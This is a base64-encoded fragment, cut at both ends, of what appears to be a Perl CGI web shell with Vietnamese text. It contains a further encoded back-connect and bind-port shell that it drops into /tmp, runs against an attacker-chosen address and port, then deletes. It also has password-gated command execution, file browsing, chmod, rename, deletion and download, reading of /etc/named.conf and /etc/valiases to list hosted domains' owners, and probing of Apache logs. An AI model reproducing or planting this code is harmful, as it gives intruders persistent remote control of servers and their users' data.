lVrZFdXekJkT3cwS0pIQnliM1J2Q1QwZ1oyVjBjSEp2ZEc5aWVXNWhiV1VvSjNSamNDY3BPdzBLSkZOb1pXeHNDVDBnSWk5aWFXNHZZbUZ6YUNJN0RRcHpiMk5yWlhRb1UwVlNWa1ZTTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2dKSEJ5YjNSdktXOXlJR1JwWlNBaWMyOWphMlYwT2lRaElqc05Dbk5sZEhOdlkydHZjSFFvVTBWU1ZrVlNMQ0JUVDB4ZlUwOURTMFZVTENCVFQxOVNSVlZUUlVGRVJGSXNJSEJoWTJzb0ltd2lMQ0F4S1NsdmNpQmthV1VnSW5ObGRITnZZMnR2Y0hRNklDUWhJanNOQ21KcGJtUW9VMFZTVmtWU0xDQnpiMk5yWVdSa2NsOXBiaWdrY0c5eWRDd2dTVTVCUkVSU1gwRk9XU2twYjNJZ1pHbGxJQ0ppYVc1a09pQWtJU0k3RFFwc2FYTjBaVzRvVTBWU1ZrVlNMQ0JUVDAxQldFTlBUazRwQ1FsdmNpQmthV1VnSW14cGMzUmxiam9nSkNFaU93MEtabTl5S0RzZ0pIQmhaR1J5SUQwZ1lXTmpaWEIwS0VOTVNVVk9WQ3dnVTBWU1ZrVlNLVHNnWTJ4dmMyVWdRMHhKUlU1VUtRMEtldzBLQ1c5d1pXNG9VMVJFU1U0c0lDSStKa05NU1VWT1ZDSXBPdzBLQ1c5d1pXNG9VMVJFVDFWVUxDQWlQaVpEVEVsRlRsUWlLVHNOQ2dsdmNHVnVLRk5VUkVWU1Vpd2dJajRtUTB4SlJVNVVJaWs3RFFvSmMzbHpkR1Z0S0NKMWJuTmxkQ0JJU1ZOVVJrbE1SVHNnZFc1elpYUWdVMEZXUlVoSlUxUWdPMlZqYUc4Z0oxc3JYU0JUZVhOMFpXMXBibVp2T2lBbk95QjFibUZ0WlNBdFlUdGxZMmh2TzJWamFHOGdKMXNyWFNCVmMyVnlhVzVtYnpvZ0p6c2dhV1E3WldOb2J6dGxZMmh2SUNkYksxMGdSR2x5WldOMGIzSjVPaUFuT3lCd2QyUTdaV05vYnpzZ1pXTm9ieUFuV3l0ZElGTm9aV3hzT2lBbk95UlRhR1ZzYkNJcE93MEtDV05zYjNObEtGTlVSRWxPS1RzTkNnbGpiRzl6WlNoVFZFUlBWVlFwT3cwS0NXTnNiM05sS0ZOVVJFVlNVaWs3RFFwOURRbz0iOwoKCSRDbGllbnRBZGRyID0gJGlueydjbGllbnRhZGRyJ307CgkkQ2xpZW50UG9ydCA9IGludCgkaW57J2NsaWVudHBvcnQnfSk7CglpZigkQ2xpZW50UG9ydCBlcSAwKQoJewoJCXJldHVybiAmQmFja0JpbmRGb3JtOwoJfWVsc2lmKCEkQ2xpZW50QWRkciBlcSAiIikKCXsKCQkkRGF0YT1kZWNvZGVfYmFzZTY0KCRiYWNrcGVybCk7CgkJaWYoLXcgIi90bXAvIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JhY2tjb25uZWN0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiYWNrY29ubmVjdC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmFja2Nvbm5lY3QucGwgJENsaWVudEFkZHIgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX1lbHNlCgl7CgkJJERhdGE9ZGVjb2RlX2Jhc2U2NCgkYmluZHBlcmwpOwoJCWlmKC13ICIvdG1wIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JpbmRwb3J0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiaW5kcG9ydC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmluZHBvcnQucGwgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX0KfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgIEFycmF5IExpc3QgRGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJtRGlyKCQpIAp7CglteSAkZGlyID0gc2hpZnQ7CiAgICBpZihvcGVuZGlyKERJUiwkZGlyKSkKCXsKCQl3aGlsZSgkZmlsZSA9IHJlYWRkaXIoRElSKSkKCQl7CgkJCWlmKCgkZmlsZSBuZSAiLiIpICYmICgkZmlsZSBuZSAiLi4iKSkKCQkJewoJCQkJJGZpbGU9ICRkaXIuJFBhdGhTZXAuJGZpbGU7CgkJCQlpZigtZCAkZmlsZSkKCQkJCXsKCQkJCQkmUm1EaXIoJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXVubGluaygkZmlsZSk7CgkJCQl9CgkJCX0KCQl9CgkJY2xvc2VkaXIoRElSKTsKCX0KCWlmKCFybWRpcigkZGlyKSkKCXsKCQkKCX0KfQpzdWIgRmlsZU93bmVyKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJHVpZCwkZ2lkKSA9IChzdGF0KCRmaWxlKSlbNCw1XTsKCQlpZigkV2luTlQpCgkJewoJCQlyZXR1cm4gIj8/PyI7CgkJfQoJCWVsc2UKCQl7CgkJCSRuYW1lPWdldHB3dWlkKCR1aWQpOwoJCQkkZ3JvdXA9Z2V0Z3JnaWQoJGdpZCk7CgkJCXJldHVybiAkbmFtZS4iLyIuJGdyb3VwOwoJCX0KCX0KCXJldHVybiAiPz8/IjsKfQpzdWIgUGFyZW50Rm9sZGVyKCQpCnsKCW15ICRwYXRoID0gc2hpZnQ7CglteSAkQ29tbSA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkIC4uIi4kQ21kU2VwLiRDbWRQd2Q7CgljaG9wKCRwYXRoID0gYCRDb21tYCk7CglyZXR1cm4gJHBhdGg7Cn0Kc3ViIEZpbGVQZXJtcygkKQp7CglteSAkZmlsZSA9IHNoaWZ0OwoJbXkgJHVyID0gIi0iOwoJbXkgJHV3ID0gIi0iOwoJaWYoLWUgJGZpbGUpCgl7CgkJaWYoJFdpbk5UKQoJCXsKCQkJaWYoLXIgJGZpbGUpeyAkdXIgPSAiciI7IH0KCQkJaWYoLXcgJGZpbGUpeyAkdXcgPSAidyI7IH0KCQkJcmV0dXJuICR1ciAuICIgLyAiIC4gJHV3OwoJCX1lbHNlCgkJewoJCQkkbW9kZT0oc3RhdCgkZmlsZSkpWzJdOwoJCQkkcmVzdWx0ID0gc3ByaW50ZigiJTA0byIsICRtb2RlICYgMDc3NzcpOwoJCQlyZXR1cm4gJHJlc3VsdDsKCQl9Cgl9CglyZXR1cm4gIjAwMDAiOwp9CnN1YiBGaWxlTGFzdE1vZGlmaWVkKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJGxhKSA9IChzdGF0KCRmaWxlKSlbOV07CgkJKCRkLCRtLCR5LCRoLCRpKSA9IChsb2NhbHRpbWUoJGxhKSlbMyw0LDUsMiwxXTsKCQkkeSA9ICR5ICsgMTkwMDsKCQlAbW9udGggPSBxdy8xIDIgMyA0IDUgNiA3IDggOSAxMCAxMSAxMi87CgkJJGxtdGltZSA9IHNwcmludGYoIiUwMmQvJXMvJTRkICUwMmQ6JTAyZCIsJGQsJG1vbnRoWyRtXSwkeSwkaCwkaSk7CgkJcmV0dXJuICRsbXRpbWU7Cgl9CglyZXR1cm4gIj8/PyI7Cn0Kc3ViIEZpbGVTaXplKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZiAkZmlsZSkKCXsKCQlyZXR1cm4gLXMgJGZpbGU7Cgl9CglyZXR1cm4gIjAiOwoKfQpzdWIgUGFyc2VGaWxlU2l6ZSgkKQp7CglteSAkc2l6ZSA9IHNoaWZ0OwoJaWYoJHNpemUgPD0gMTAyNCkKCXsKCQlyZXR1cm4gJHNpemUuICIgQiI7Cgl9CgllbHNlCgl7CgkJaWYoJHNpemUgPD0gMTAyNCoxMDI0KSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4wMmYiLCRzaXplIC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIEtCIjsKCQl9CgkJZWxzZSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4yZiIsJHNpemUgLyAxMDI0IC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIE1CIjsKCQl9Cgl9Cn0Kc3ViIHRyaW0oJCkKewoJbXkgJHN0cmluZyA9IHNoaWZ0OwoJJHN0cmluZyA9fiBzL15ccysvLzsKCSRzdHJpbmcgPX4gcy9ccyskLy87CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgQWRkU2xhc2hlcygkKQp7CglteSAkc3RyaW5nID0gc2hpZnQ7Cgkkc3RyaW5nPX4gcy9cXC9cXFxcL2c7CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgTGlzdERpcgp7CglteSAkcGF0aCA9ICRDdXJyZW50RGlyLiRQYXRoU2VwOwoJJHBhdGg9fiBzL1xcXFwvXFwvZzsKCW15ICRyZXN1bHQgPSAiPGZvcm0gbmFtZT0nZicgYWN0aW9uPSckU2NyaXB0TG9jYXRpb24nPjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+UGF0aDogWyAiLiZBZGRMaW5rRGlyKCJndWkiKS4iIF0gPC9zcGFuPjxpbnB1dCB0eXBlPSd0ZXh0JyBuYW1lPSdkJyBzaXplPSc0MCcgdmFsdWU9JyRDdXJyZW50RGlyJyAvPjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2EnIHZhbHVlPSdndWknPjxpbnB1dCBjbGFzcz0nc3VibWl0JyB0eXBlPSdzdWJtaXQnIHZhbHVlPSdDaGFuZ2UnPjwvZm9ybT4iOwoJaWYoLWQgJHBhdGgpCgl7CgkJbXkgQGZuYW1lID0gKCk7CgkJbXkgQGRuYW1lID0gKCk7CgkJaWYob3BlbmRpcihESVIsJHBhdGgpKQoJCXsKCQkJd2hpbGUoJGZpbGUgPSByZWFkZGlyKERJUikpCgkJCXsKCQkJCSRmPSRwYXRoLiRmaWxlOwoJCQkJaWYoLWQgJGYpCgkJCQl7CgkJCQkJcHVzaChAZG5hbWUsJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXB1c2goQGZuYW1lLCRmaWxlKTsKCQkJCX0KCQkJfQoJCQljbG9zZWRpcihESVIpOwoJCX0KCQlAZm5hbWUgPSBzb3J0IHsgbGMoJGEpIGNtcCBsYygkYikgfSBAZm5hbWU7CgkJQGRuYW1lID0gc29ydCB7IGxjKCRhKSBjbXAgbGMoJGIpIH0gQGRuYW1lOwoJCSRyZXN1bHQgLj0gIjxkaXY+PHRhYmxlIHdpZHRoPSc5MCUnIGNsYXNzPSdsaXN0ZGlyJz4KCgkJPHRyIHN0eWxlPSdiYWNrZ3JvdW5kLWNvbG9yOiAjM2UzZTNlJz48dGg+RmlsZSBOYW1lPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjEwMHB4Oyc+RmlsZSBTaXplPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+T3duZXI8L3RoPgoJCTx0aCBzdHlsZT0nd2lkdGg6MTAwcHg7Jz5QZXJtaXNzaW9uPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+TGFzdCBNb2RpZmllZDwvdGg+CgkJPHRoIHN0eWxlPSd3aWR0aDoyNjBweDsnPkFjdGlvbjwvdGg+PC90cj4iOwoJCW15ICRzdHlsZT0ibGluZSI7CgkJbXkgJGk9MDsKCQlmb3JlYWNoIG15ICRkIChAZG5hbWUpCgkJewoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOwoJCQkkZCA9ICZ0cmltKCRkKTsKCQkJJGRpcm5hbWU9JGQ7CgkJCWlmKCRkIGVxICIuLiIpIAoJCQl7CgkJCQkkZCA9ICZQYXJlbnRGb2xkZXIoJHBhdGgpOwoJCQl9CgkJCWVsc2lmKCRkIGVxICIuIikgCgkJCXsKCQkJCSRkID0gJHBhdGg7CgkJCX0KCQkJZWxzZSAKCQkJewoJCQkJJGQgPSAkcGF0aC4kZDsKCQkJfQoJCQkkcmVzdWx0IC49ICI8dHIgY2xhc3M9JyRzdHlsZSc+CgoJCQk8dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+PGEgIGhyZWY9Jz9hPWd1aSZkPSIuJGQuIic+WyAiLiRkaXJuYW1lLiIgXTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZD5ESVI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz4iLiZGaWxlT3duZXIoJGQpLiI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBpZD0nRmlsZVBlcm1zXyRpJyBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7JyBvbmRibGNsaWNrPVwicm1fY2htb2RfZm9ybSh0aGlzLCIuJGkuIiwnIi4mRmlsZVBlcm1zKCRkKS4iJywnIi4kZGlybmFtZS4iJylcIiA+PHNwYW4gb25jbGljaz1cImNobW9kX2Zvcm0oIi4kaS4iLCciLiRkaXJuYW1lLiInKVwiID4iLiZGaWxlUGVybXMoJGQpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZCkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZGlybmFtZScsJyIuJkFkZFNsYXNoZXMoJkFkZFNsYXNoZXMoJGQpKS4iJylcIj5SZW5hbWU8L2E+ICB8IDxhIG9uY2xpY2s9XCJpZighY29uZmlybSgnUmVtb3ZlIGRpcjogJGRpcm5hbWUgPycpKSB7IHJldHVybiBmYWxzZTt9XCIgaHJlZj0nP2E9Z3VpJmQ9JHBhdGgmcmVtb3ZlPSRkaXJuYW1lJz5SZW1vdmU8L2E+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8L3RyPiI7CgkJCSRpKys7CgkJfQoJCWZvcmVhY2ggbXkgJGYgKEBmbmFtZSkKCQl7CgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlPSRmOwoJCQkkZiA9ICRwYXRoLiRmOwoJCQkkdmlldyA9ICI/ZGlyPSIuJHBhdGguIiZ2aWV3PSIuJGY7CgkJCSRyZXN1bHQgLj0gIjx0ciBjbGFzcz0nJHN0eWxlJz48dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7Jz48YSBocmVmPSc/YT1jb21tYW5kJmQ9Ii4kcGF0aC4iJmM9ZWRpdCUyMCIuJGZpbGUuIic+Ii4kZmlsZS4iPC9hPjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkPiIuJlBhcnNlRmlsZVNpemUoJkZpbGVTaXplKCRmKSkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPiIuJkZpbGVPd25lcigkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIGlkPSdGaWxlUGVybXNfJGknIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnIG9uZGJsY2xpY2s9XCJybV9jaG1vZF9mb3JtKHRoaXMsIi4kaS4iLCciLiZGaWxlUGVybXMoJGYpLiInLCciLiRmaWxlLiInKVwiID48c3BhbiBvbmNsaWNrPVwiY2htb2RfZm9ybSgkaSwnJGZpbGUnKVwiID4iLiZGaWxlUGVybXMoJGYpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0iLiRwYXRoLiImYz1lZGl0JTIwIi4kZmlsZS4iJz5FZGl0PC9hPiB8IDxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZmlsZScsJ2YnKVwiPlJlbmFtZTwvYT4gfCA8YSBocmVmPSc/YT1kb3dubG9hZCZvPWdvJmY9Ii4kZi4iJz5Eb3dubG9hZDwvYT4gfCA8YSBvbmNsaWNrPVwiaWYoIWNvbmZpcm0oJ1JlbW92ZSBmaWxlOiAkZmlsZSA/JykpIHsgcmV0dXJuIGZhbHNlO31cIiBocmVmPSc/YT1ndWkmZD0kcGF0aCZyZW1vdmU9JGZpbGUnPlJlbW92ZTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjwvdHI+IjsKCQkJJGkrKzsKCQl9CgkJJHJlc3VsdCAuPSAiPC90YWJsZT48L2Rpdj4iOwoJfQoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRyeSB0byBWaWV3IExpc3QgVXNlcgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBWaWV3RG9tYWluVXNlcgp7CglvcGVuIChkb21haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOwoJbXkgQGNuenMgPSA8ZG9tYWlucz47CgljbG9zZSBkMG1haW5zOwoJbXkgJHN0eWxlPSJsaW5lIjsKCW15ICRyZXN1bHQ9IjxoNT48Zm9udCBzdHlsZT0nZm9udDogMTVwdCBWZXJkYW5hO2NvbG9yOiAjZmY5OTAwOyc+SG9hbmcgU2EgLSBUcnVvbmcgU2E8L2ZvbnQ+PC9oNT4iOwoJaWYgKCRlcnIpCgl7CgkJJHJlc3VsdCAuPSAgKCc8cD5DMHVsZG5cJ3QgQnlwYXNzIGl0ICwgU29ycnk8L3A+Jyk7CgkJcmV0dXJuICRyZXN1bHQ7Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJzx0YWJsZT48dHI+PHRoPkRvbWFpbnM8L3RoPiA8dGg+VXNlcjwvdGg+PC90cj4nOwoJfQoJZm9yZWFjaCBteSAkb25lIChAY256cykKCXsKCQlpZigkb25lID1+IG0vLio/em9uZSAiKC4qPykiIHsvKQoJCXsJCgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlbmFtZT0gIi9ldGMvdmFsaWFzZXMvIi4kb25lOwoJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7CgkJCSRyZXN1bHQgLj0gJzx0ciBjbGFzcz0iJHN0eWxlIiB3aWR0aD01MCU+PHRkPicuJG9uZS4nIDwvdGQ+PHRkPiAnLiRvd25lci4nPC90ZD48L3RyPic7CgkJfQoJfQoJJHJlc3VsdCAuPSAnPC90YWJsZT4nOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFZpZXcgTG9nCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFZpZXdMb2cKewoJaWYoJFdpbk5UKQoJewoJCXJldHVybiAiPGgyPjxmb250IHN0eWxlPSdmb250OiAyMHB0IFZlcmRhbmE7Y29sb3I6ICNmZjk5MDA7Jz5Eb24ndCBydW4gb24gV2luZG93czwvZm9udD48L2gyPiI7Cgl9CglteSAkcmVzdWx0PSI8dGFibGU+PHRyPjx0aD5QYXRoIExvZzwvdGg+PHRoPlN1Ym1pdDwvdGg+PC90cj4iOwoJbXkgQHBhdGhsb2c9KAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3JfbG9nJywKCQkJCScvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2cnLAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZycKCQkJCSk7CglteSAkaT0wOwoJbXkgJHBlcm1zOwoJbXkgJHNsOwoJZm9yZWFjaCBteSAkbG9nIChAcGF0aGxvZykKCXsKCQlpZigtdyAkbG9nKQoJCXsKCQkJJHBlcm1zPSJPSyI7CgkJfWVsc2UKCQl7CgkJCWNob3AoJHNsID0gYGxuIC1zICRsb2cgZXJyb3JfbG9nXyRpYCk7CgkJCWlmKCZ0cmltKCRscykgZXEgIiIpCgkJCXsKCQkJCWlmKC1yICRscykKCQkJCXsKCQkJCQkkcGVybXM9Ik9LIjsKCQkJCQkkbG9nPSJlcnJvcl9sb2dfIi4kaTsKCQkJCX0KCQkJfWVsc2UKCQkJewoJCQkJJHBlcm1zPSI8Zm9udCBzdHlsZT0nY29sb3I6IHJlZDsnPkNhbmNlbDxmb250PiI7CgkJCX0KCQl9CgkJJHJlc3VsdCAuPTw8RU5EOwoJCTx0cj4KCgkJCTxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPgoJCQk8dGQ+PGlucHV0IHR5cGU9InRleHQiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsb2dfJGknKS52YWx1ZT0nbGVzredICsgdGhpcy52YWx1ZTsiIHZhbHVlPSIkbG9nIiBzaXplPSc1MCcvPjwvdGQ+CgkJCTx0ZD48aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVHJ5IiAvPjwvdGQ+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJsb2dfJGkiIG5hbWU9ImMiIHZhbHVlPSJsZXNzICRsb2ciLz4KCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiIC8+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciIgLz4KCQkJPC9mb3JtPgoJCQk8dGQ+JHBlcm1zPC90ZD4KCgkJPC90cj4KRU5ECgkJJGkrKzsKCX0KCSRyZXN1bHQgLj0iPC90YWJsZT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIE1haW4gUHJvZ3JhbSAtIEV4ZWN1dGlvbiBTdGFydHMgSGVyZQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiZSZWFkUGFyc2U7CiZHZXRDb29raWVzOwoKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9OwokUnVuQ29tbWFuZCA9ICRpbnsnYyd9OwokVHJhbnNmZXJGaWxlID0gJGlueydmJ307CiRPcHRpb25zID0gJGlueydvJ307CiRBY3Rpb24gPSAkaW57J2EnfTsKCiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAmdHJpbSgkaW57J2QnfSk7CiMgbWFjIGRpbmggeHVhdCB0aG9uZyB0aW4gbmV1IGtvIGNvIGxlbmggbmFvIQokUnVuQ29tbWFuZD0gJFdpbk5UPyJkaXIiOiJkaXIgLWxpYSIgaWYoJFJ1bkNvbW1hbmQgZXEgIiIpOwpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7CgokTG9nZ2VkSW4gPSAkQ29va2llc3snU0FWRURQV0QnfSBlcSAkUGFzc3dvcmQ7CgppZigkQWN0aW9uIGVxICJsb2dpbiIgfHwgISRMb2dnZWRJbikgCQkjIHVzZXIgbmVlZHMvaGFzIHRvIGxvZ2luCnsKCSZQZXJmb3JtTG9naW47Cn1lbHNpZigkQWN0aW9uIGVxICJndWkiKSAjIEdVSSBkaXJlY3RvcnkKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCEkV2luTlQpCgl7CgkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCWlmKCEoJGNobW9kIGVxIDApKQoJCXsKCQkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCQkkZmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kVHJhbnNmZXJGaWxlOwoJCQljaG9wKCRyZXN1bHQ9IGBjaG1vZCAkY2htb2QgIiRmaWxlImApOwoJCQlpZigmdHJpbSgkcmVzdWx0KSBlcSAiIikKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CgkJfQoJfQoJJHJlbmFtZT0kaW57J3JlbmFtZSd9OwoJaWYoISRyZW5hbWUgZXEgIiIpCgl7CgkJaWYocmVuYW1lKCRUcmFuc2ZlckZpbGUsJHJlbmFtZSkpCgkJewoJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7CgkJfWVsc2UKCQl7CgkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7CgkJfQoJfQoJJHJlbW92ZT0kaW57J3JlbW92ZSd9OwoJaWYoJHJlbW92ZSBuZSAiIikKCXsKCQkkcm0gPSAkQ3VycmVudERpci4kUGF0aFNlcC4kcmVtb3ZlOwoJCWlmKC1kICRybSkKCQl7CgkJCSZSbURpcigkcm0pOwoJCX1lbHNlCgkJewoJCQlpZih1bmxpbmsoJHJtKSkKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CQkJCgkJfQoJfQoJcHJpbnQgJkxpc3REaXI7Cgp9CmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKQkJCQkgCSMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kCnsKCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCXByaW50ICZFeGVjdXRlQ29tbWFuZDsKfQplbHNpZigkQWN0aW9uIGVxICJzYXZlIikJCQkJIAkjIHVzZXIgd2FudHMgdG8gc2F2ZSBhIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCZTYXZlRmlsZSgkaW57J2RhdGEnfSwkaW57J2ZpbGUnfSkpCgl7CgkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJfWVsc2UKCXsKCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJfQoJcHJpbnQgJkxpc3REaXI7Cn0KZWx